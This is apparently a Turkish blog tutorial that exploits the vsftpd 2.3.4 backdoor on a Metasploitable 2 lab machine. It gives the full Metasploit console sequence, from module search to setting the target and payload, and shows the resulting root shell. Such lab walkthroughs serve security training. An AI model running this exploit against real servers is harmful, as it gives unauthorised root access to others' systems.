SECURITY GENEL

Metasploitable 2 Exploit vsftpd

Metasploitable 2 Exploit vsftpd

Exploit #1 : vsftpd

Sonuçlarda ilk sıradaki ftp sunucusuna bakıldığında vsftpd 2.3.4 gözüküyor. Bununla bir google araması yapılırsa , bu sunucu kullanılarak sistemde bir backdoor açılabileceği görülebilir. Metasploit Framework msfconsole ile başlatılır. Ekranda msf> gözüktüğünde artık kullanıma hazırdır. Önce vsftpd aratılır ve listelenir.

msf > search vsftpd

 

Matching Modules

================

  Name                               Disclosure Date       Rank    Description

  —-                               —————       —-    ———–

  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution

 

Tek sonuç çıktı. Bulunan exploiti kullanmak için ;

 

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > show options

 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

  Name   Current Setting  Required  Description

  —-   —————  ——–  ———–

  RHOST                yes    The target address

  RPORT  21            yes    The target port

 

Exploit target:

  Id  Name

  —  —-

  0   Automatic

 

Girilmesi gereken değerler için Required kolonunda yes yazar. Sırayla hedef sistem hakkında istenen bilgiler set NAME değer olarak yazılır. Burada sadece RHOST değeri girilir.

 

msf exploit(vsftpd_234_backdoor) > set RHOST 172.16.52.133

RHOST => 172.16.52.133

 

Bu exploitle kullanılabilecek payloadlar listelenir.

 

msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads

===================

  Name            Disclosure Date  Rank Description

  —-            —————  —- ———–

  cmd/unix/interact                normal  Unix Command, Interact with Established Connection

 

msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact

PAYLOAD => cmd/unix/interact

msf exploit(vsftpd_234_backdoor) > show options

 

Payloadun istediği veriler için yine show options komutu kullanılır ve gerekli değerler girilir.

 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

  Name   Current Setting  Required  Description

  —-   —————  ——–  ———–

  RHOST  172.16.52.133 yes    The target address

  RPORT  21            yes    The target port

 

Payload options (cmd/unix/interact):

  Name  Current Setting  Required  Description

  —-  —————  ——–  ———–

 

Exploit target:

  Id  Name

  —  —-

  0   Automatic

Artık herşey hazır olduğuna göre exploit denir.

 

msf exploit(vsftpd_234_backdoor) > exploit

 

[*] Banner: 220 (vsFTPd 2.3.4)

[*] USER: 331 Please specify the password.

[+] Backdoor service has been spawned, handling…

[+] UID: uid=0(root) gid=0(root)

[*] Found shell.

[*] Command shell session 1 opened (172.16.52.128:53335 -> 172.16.52.133:6200) at 2013-07-27 23:55:12 +0300

 

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami

root

 

Sisteme root haklarıyla giriş yapılmış.

Etiketler

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu
Kapalı
Kapalı